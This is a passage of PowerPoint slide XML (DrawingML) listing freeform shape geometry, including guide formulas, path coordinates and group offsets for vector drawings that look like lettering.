                    <a:gd name="T52" fmla="*/ 735 w 757"/>
                    <a:gd name="T53" fmla="*/ 567 h 626"/>
                    <a:gd name="T54" fmla="*/ 714 w 757"/>
                    <a:gd name="T55" fmla="*/ 625 h 626"/>
                    <a:gd name="T56" fmla="*/ 614 w 757"/>
                    <a:gd name="T57" fmla="*/ 588 h 626"/>
                    <a:gd name="T58" fmla="*/ 614 w 757"/>
                    <a:gd name="T59" fmla="*/ 588 h 626"/>
                    <a:gd name="T60" fmla="*/ 630 w 757"/>
                    <a:gd name="T61" fmla="*/ 557 h 6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757" h="626">
                      <a:moveTo>
                        <a:pt x="630" y="557"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="609" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="582" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="284"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="740" y="426"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="756" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="745" y="526"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="614" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="630" y="557"/>
                      </a:ln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106" name="Group 105"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2684681" y="1913022"/>
              <a:ext cx="1648438" cy="1930221"/>
              <a:chOff x="2414588" y="4352925"/>
              <a:chExt cx="1671637" cy="1957388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107" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2414588" y="4352925"/>
                <a:ext cx="268287" cy="174625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 709 w 746"/>
                  <a:gd name="T1" fmla="*/ 126 h 484"/>
                  <a:gd name="T2" fmla="*/ 745 w 746"/>
                  <a:gd name="T3" fmla="*/ 273 h 484"/>
                  <a:gd name="T4" fmla="*/ 294 w 746"/>
                  <a:gd name="T5" fmla="*/ 388 h 484"/>
                  <a:gd name="T6" fmla="*/ 310 w 746"/>
                  <a:gd name="T7" fmla="*/ 456 h 484"/>
                  <a:gd name="T8" fmla="*/ 200 w 746"/>
                  <a:gd name="T9" fmla="*/ 483 h 484"/>
                  <a:gd name="T10" fmla="*/ 179 w 746"/>
                  <a:gd name="T11" fmla="*/ 415 h 484"/>
                  <a:gd name="T12" fmla="*/ 32 w 746"/>
                  <a:gd name="T13" fmla="*/ 451 h 484"/>
                  <a:gd name="T14" fmla="*/ 0 w 746"/>
                  <a:gd name="T15" fmla="*/ 320 h 484"/>
                  <a:gd name="T16" fmla="*/ 147 w 746"/>
                  <a:gd name="T17" fmla="*/ 283 h 484"/>
                  <a:gd name="T18" fmla="*/ 84 w 746"/>
                  <a:gd name="T19" fmla="*/ 26 h 484"/>
                  <a:gd name="T20" fmla="*/ 205 w 746"/>
                  <a:gd name="T21" fmla="*/ 0 h 484"/>
                  <a:gd name="T22" fmla="*/ 709 w 746"/>
                  <a:gd name="T23" fmla="*/ 126 h 484"/>
                  <a:gd name="T24" fmla="*/ 530 w 746"/>
                  <a:gd name="T25" fmla="*/ 184 h 484"/>
                  <a:gd name="T26" fmla="*/ 226 w 746"/>
                  <a:gd name="T27" fmla="*/ 115 h 484"/>
                  <a:gd name="T28" fmla="*/ 263 w 746"/>
                  <a:gd name="T29" fmla="*/ 252 h 484"/>
                  <a:gd name="T30" fmla="*/ 530 w 746"/>
                  <a:gd name="T31" fmla="*/ 188 h 484"/>
                  <a:gd name="T32" fmla="*/ 530 w 746"/>
                  <a:gd name="T33" fmla="*/ 184 h 4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46" h="484">
                    <a:moveTo>
                      <a:pt x="709" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="126"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="530" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="226" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="184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08" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2443163" y="4557713"/>
                <a:ext cx="69850" cy="65087"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 195"/>
                  <a:gd name="T1" fmla="*/ 178 h 179"/>
                  <a:gd name="T2" fmla="*/ 0 w 195"/>
                  <a:gd name="T3" fmla="*/ 47 h 179"/>
                  <a:gd name="T4" fmla="*/ 157 w 195"/>
                  <a:gd name="T5" fmla="*/ 0 h 179"/>
                  <a:gd name="T6" fmla="*/ 194 w 195"/>
                  <a:gd name="T7" fmla="*/ 131 h 179"/>
                  <a:gd name="T8" fmla="*/ 42 w 195"/>
                  <a:gd name="T9" fmla="*/ 178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5" h="179">
                    <a:moveTo>
                      <a:pt x="42" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="178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9" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520950" y="4641850"/>
                <a:ext cx="296863" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 825"/>
                  <a:gd name="T1" fmla="*/ 451 h 615"/>
                  <a:gd name="T2" fmla="*/ 215 w 825"/>
                  <a:gd name="T3" fmla="*/ 457 h 615"/>
                  <a:gd name="T4" fmla="*/ 767 w 825"/>
                  <a:gd name="T5" fmla="*/ 352 h 615"/>
                  <a:gd name="T6" fmla="*/ 824 w 825"/>
                  <a:gd name="T7" fmla="*/ 494 h 615"/>
                  <a:gd name="T8" fmla="*/ 73 w 825"/>
                  <a:gd name="T9" fmla="*/ 614 h 615"/>
                  <a:gd name="T10" fmla="*/ 0 w 825"/>
                  <a:gd name="T11" fmla="*/ 441 h 615"/>
                  <a:gd name="T12" fmla="*/ 624 w 825"/>
                  <a:gd name="T13" fmla="*/ 0 h 615"/>
                  <a:gd name="T14" fmla="*/ 682 w 825"/>
                  <a:gd name="T15" fmla="*/ 147 h 615"/>
                  <a:gd name="T16" fmla="*/ 215 w 825"/>
                  <a:gd name="T17" fmla="*/ 451 h 6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25" h="615">
                    <a:moveTo>
                      <a:pt x="215" y="451"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="451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0" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2595563" y="4859338"/>
                <a:ext cx="238125" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 662"/>
                  <a:gd name="T1" fmla="*/ 478 h 631"/>
                  <a:gd name="T2" fmla="*/ 157 w 662"/>
                  <a:gd name="T3" fmla="*/ 478 h 631"/>
                  <a:gd name="T4" fmla="*/ 110 w 662"/>
                  <a:gd name="T5" fmla="*/ 472 h 631"/>
                  <a:gd name="T6" fmla="*/ 94 w 662"/>
                  <a:gd name="T7" fmla="*/ 461 h 631"/>
                  <a:gd name="T8" fmla="*/ 73 w 662"/>
                  <a:gd name="T9" fmla="*/ 451 h 631"/>
                  <a:gd name="T10" fmla="*/ 73 w 662"/>
                  <a:gd name="T11" fmla="*/ 451 h 631"/>
                  <a:gd name="T12" fmla="*/ 47 w 662"/>
                  <a:gd name="T13" fmla="*/ 425 h 631"/>
                  <a:gd name="T14" fmla="*/ 21 w 662"/>
                  <a:gd name="T15" fmla="*/ 383 h 631"/>
                  <a:gd name="T16" fmla="*/ 21 w 662"/>
                  <a:gd name="T17" fmla="*/ 383 h 631"/>
                  <a:gd name="T18" fmla="*/ 10 w 662"/>
                  <a:gd name="T19" fmla="*/ 357 h 631"/>
                  <a:gd name="T20" fmla="*/ 5 w 662"/>
                  <a:gd name="T21" fmla="*/ 325 h 631"/>
                  <a:gd name="T22" fmla="*/ 0 w 662"/>
                  <a:gd name="T23" fmla="*/ 299 h 631"/>
                  <a:gd name="T24" fmla="*/ 5 w 662"/>
                  <a:gd name="T25" fmla="*/ 273 h 631"/>
                  <a:gd name="T26" fmla="*/ 5 w 662"/>
                  <a:gd name="T27" fmla="*/ 273 h 631"/>
                  <a:gd name="T28" fmla="*/ 21 w 662"/>
                  <a:gd name="T29" fmla="*/ 252 h 631"/>
                  <a:gd name="T30" fmla="*/ 37 w 662"/>
                  <a:gd name="T31" fmla="*/ 231 h 631"/>
                  <a:gd name="T32" fmla="*/ 63 w 662"/>
                  <a:gd name="T33" fmla="*/ 210 h 631"/>
                  <a:gd name="T34" fmla="*/ 100 w 662"/>
                  <a:gd name="T35" fmla="*/ 189 h 631"/>
                  <a:gd name="T36" fmla="*/ 467 w 662"/>
                  <a:gd name="T37" fmla="*/ 0 h 631"/>
                  <a:gd name="T38" fmla="*/ 535 w 662"/>
                  <a:gd name="T39" fmla="*/ 131 h 631"/>
                  <a:gd name="T40" fmla="*/ 189 w 662"/>
                  <a:gd name="T41" fmla="*/ 304 h 631"/>
                  <a:gd name="T42" fmla="*/ 189 w 662"/>
                  <a:gd name="T43" fmla="*/ 304 h 631"/>
                  <a:gd name="T44" fmla="*/ 157 w 662"/>
                  <a:gd name="T45" fmla="*/ 325 h 631"/>
                  <a:gd name="T46" fmla="*/ 142 w 662"/>
                  <a:gd name="T47" fmla="*/ 341 h 631"/>
                  <a:gd name="T48" fmla="*/ 142 w 662"/>
                  <a:gd name="T49" fmla="*/ 341 h 631"/>
                  <a:gd name="T50" fmla="*/ 137 w 662"/>
                  <a:gd name="T51" fmla="*/ 367 h 631"/>
                  <a:gd name="T52" fmla="*/ 147 w 662"/>
                  <a:gd name="T53" fmla="*/ 394 h 631"/>
                  <a:gd name="T54" fmla="*/ 147 w 662"/>
                  <a:gd name="T55" fmla="*/ 394 h 631"/>
                  <a:gd name="T56" fmla="*/ 157 w 662"/>
                  <a:gd name="T57" fmla="*/ 409 h 631"/>
                  <a:gd name="T58" fmla="*/ 168 w 662"/>
                  <a:gd name="T59" fmla="*/ 420 h 631"/>
                  <a:gd name="T60" fmla="*/ 178 w 662"/>
                  <a:gd name="T61" fmla="*/ 431 h 631"/>
                  <a:gd name="T62" fmla="*/ 194 w 662"/>
                  <a:gd name="T63" fmla="*/ 435 h 631"/>
                  <a:gd name="T64" fmla="*/ 210 w 662"/>
                  <a:gd name="T65" fmla="*/ 435 h 631"/>
                  <a:gd name="T66" fmla="*/ 226 w 662"/>
                  <a:gd name="T67" fmla="*/ 435 h 631"/>
                  <a:gd name="T68" fmla="*/ 263 w 662"/>
                  <a:gd name="T69" fmla="*/ 420 h 631"/>
                  <a:gd name="T70" fmla="*/ 593 w 662"/>
                  <a:gd name="T71" fmla="*/ 252 h 631"/>
                  <a:gd name="T72" fmla="*/ 661 w 662"/>
                  <a:gd name="T73" fmla="*/ 383 h 631"/>
                  <a:gd name="T74" fmla="*/ 157 w 662"/>
                  <a:gd name="T75" fmla="*/ 630 h 631"/>
                  <a:gd name="T76" fmla="*/ 100 w 662"/>
                  <a:gd name="T77" fmla="*/ 509 h 631"/>
                  <a:gd name="T78" fmla="*/ 157 w 662"/>
                  <a:gd name="T79" fmla="*/ 478 h 6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62" h="631">
                    <a:moveTo>
                      <a:pt x="157" y="478"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="157" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="478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1" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2678113" y="4995863"/>
                <a:ext cx="257175" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 714 w 715"/>
                  <a:gd name="T1" fmla="*/ 120 h 495"/>
                  <a:gd name="T2" fmla="*/ 68 w 715"/>
                  <a:gd name="T3" fmla="*/ 494 h 495"/>
                  <a:gd name="T4" fmla="*/ 0 w 715"/>
                  <a:gd name="T5" fmla="*/ 367 h 495"/>
                  <a:gd name="T6" fmla="*/ 640 w 715"/>
                  <a:gd name="T7" fmla="*/ 0 h 495"/>
                  <a:gd name="T8" fmla="*/ 714 w 715"/>
                  <a:gd name="T9" fmla="*/ 120 h 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5" h="495">
                    <a:moveTo>
                      <a:pt x="714" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="68" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="12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2" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2724150" y="5103813"/>
                <a:ext cx="239713" cy="238125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 546 w 668"/>
                  <a:gd name="T1" fmla="*/ 115 h 663"/>
                  <a:gd name="T2" fmla="*/ 488 w 668"/>
                  <a:gd name="T3" fmla="*/ 152 h 663"/>
                  <a:gd name="T4" fmla="*/ 494 w 668"/>
                  <a:gd name="T5" fmla="*/ 152 h 663"/>
                  <a:gd name="T6" fmla="*/ 494 w 668"/>
                  <a:gd name="T7" fmla="*/ 152 h 663"/>
                  <a:gd name="T8" fmla="*/ 535 w 668"/>
                  <a:gd name="T9" fmla="*/ 152 h 663"/>
                  <a:gd name="T10" fmla="*/ 556 w 668"/>
                  <a:gd name="T11" fmla="*/ 163 h 663"/>
                  <a:gd name="T12" fmla="*/ 578 w 668"/>
                  <a:gd name="T13" fmla="*/ 168 h 663"/>
                  <a:gd name="T14" fmla="*/ 578 w 668"/>
                  <a:gd name="T15" fmla="*/ 168 h 663"/>
                  <a:gd name="T16" fmla="*/ 609 w 668"/>
                  <a:gd name="T17" fmla="*/ 195 h 663"/>
                  <a:gd name="T18" fmla="*/ 635 w 668"/>
                  <a:gd name="T19" fmla="*/ 225 h 663"/>
                  <a:gd name="T20" fmla="*/ 635 w 668"/>
                  <a:gd name="T21" fmla="*/ 225 h 663"/>
                  <a:gd name="T22" fmla="*/ 651 w 668"/>
                  <a:gd name="T23" fmla="*/ 257 h 663"/>
                  <a:gd name="T24" fmla="*/ 662 w 668"/>
                  <a:gd name="T25" fmla="*/ 284 h 663"/>
                  <a:gd name="T26" fmla="*/ 667 w 668"/>
                  <a:gd name="T27" fmla="*/ 310 h 663"/>
                  <a:gd name="T28" fmla="*/ 662 w 668"/>
                  <a:gd name="T29" fmla="*/ 336 h 663"/>
                  <a:gd name="T30" fmla="*/ 662 w 668"/>
                  <a:gd name="T31" fmla="*/ 336 h 663"/>
                  <a:gd name="T32" fmla="*/ 651 w 668"/>
                  <a:gd name="T33" fmla="*/ 362 h 663"/>
                  <a:gd name="T34" fmla="*/ 635 w 668"/>
                  <a:gd name="T35" fmla="*/ 389 h 663"/>
                  <a:gd name="T36" fmla="*/ 615 w 668"/>
                  <a:gd name="T37" fmla="*/ 409 h 663"/>
                  <a:gd name="T38" fmla="*/ 578 w 668"/>
                  <a:gd name="T39" fmla="*/ 436 h 663"/>
                  <a:gd name="T40" fmla="*/ 231 w 668"/>
                  <a:gd name="T41" fmla="*/ 662 h 663"/>
                  <a:gd name="T42" fmla="*/ 152 w 668"/>
                  <a:gd name="T43" fmla="*/ 541 h 663"/>
                  <a:gd name="T44" fmla="*/ 478 w 668"/>
                  <a:gd name="T45" fmla="*/ 331 h 663"/>
                  <a:gd name="T46" fmla="*/ 478 w 668"/>
                  <a:gd name="T47" fmla="*/ 331 h 663"/>
                  <a:gd name="T48" fmla="*/ 509 w 668"/>
                  <a:gd name="T49" fmla="*/ 305 h 663"/>
                  <a:gd name="T50" fmla="*/ 520 w 668"/>
                  <a:gd name="T51" fmla="*/ 284 h 663"/>
                  <a:gd name="T52" fmla="*/ 520 w 668"/>
                  <a:gd name="T53" fmla="*/ 284 h 663"/>
                  <a:gd name="T54" fmla="*/ 520 w 668"/>
                  <a:gd name="T55" fmla="*/ 262 h 663"/>
                  <a:gd name="T56" fmla="*/ 509 w 668"/>
                  <a:gd name="T57" fmla="*/ 236 h 663"/>
                  <a:gd name="T58" fmla="*/ 509 w 668"/>
                  <a:gd name="T59" fmla="*/ 236 h 663"/>
                  <a:gd name="T60" fmla="*/ 498 w 668"/>
                  <a:gd name="T61" fmla="*/ 221 h 663"/>
                  <a:gd name="T62" fmla="*/ 488 w 668"/>
                  <a:gd name="T63" fmla="*/ 210 h 663"/>
                  <a:gd name="T64" fmla="*/ 472 w 668"/>
                  <a:gd name="T65" fmla="*/ 205 h 663"/>
                  <a:gd name="T66" fmla="*/ 462 w 668"/>
                  <a:gd name="T67" fmla="*/ 199 h 663"/>
                  <a:gd name="T68" fmla="*/ 446 w 668"/>
                  <a:gd name="T69" fmla="*/ 199 h 663"/>
                  <a:gd name="T70" fmla="*/ 425 w 668"/>
                  <a:gd name="T71" fmla="*/ 205 h 663"/>
                  <a:gd name="T72" fmla="*/ 388 w 668"/>
                  <a:gd name="T73" fmla="*/ 221 h 663"/>
                  <a:gd name="T74" fmla="*/ 79 w 668"/>
                  <a:gd name="T75" fmla="*/ 425 h 663"/>
                  <a:gd name="T76" fmla="*/ 0 w 668"/>
                  <a:gd name="T77" fmla="*/ 305 h 663"/>
                  <a:gd name="T78" fmla="*/ 472 w 668"/>
                  <a:gd name="T79" fmla="*/ 0 h 663"/>
                  <a:gd name="T80" fmla="*/ 546 w 668"/>
                  <a:gd name="T81" fmla="*/ 115 h 6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68" h="663">
                    <a:moveTo>
                      <a:pt x="546" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="115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" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2855913" y="5280025"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 574"/>
                  <a:gd name="T1" fmla="*/ 251 h 531"/>
                  <a:gd name="T2" fmla="*/ 153 w 574"/>
                  <a:gd name="T3" fmla="*/ 283 h 531"/>
                  <a:gd name="T4" fmla="*/ 126 w 574"/>
                  <a:gd name="T5" fmla="*/ 314 h 531"/>
                  <a:gd name="T6" fmla="*/ 116 w 574"/>
                  <a:gd name="T7" fmla="*/ 351 h 531"/>
                  <a:gd name="T8" fmla="*/ 121 w 574"/>
                  <a:gd name="T9" fmla="*/ 367 h 531"/>
                  <a:gd name="T10" fmla="*/ 126 w 574"/>
                  <a:gd name="T11" fmla="*/ 383 h 531"/>
                  <a:gd name="T12" fmla="*/ 153 w 574"/>
                  <a:gd name="T13" fmla="*/ 404 h 531"/>
                  <a:gd name="T14" fmla="*/ 179 w 574"/>
                  <a:gd name="T15" fmla="*/ 409 h 531"/>
                  <a:gd name="T16" fmla="*/ 216 w 574"/>
                  <a:gd name="T17" fmla="*/ 404 h 531"/>
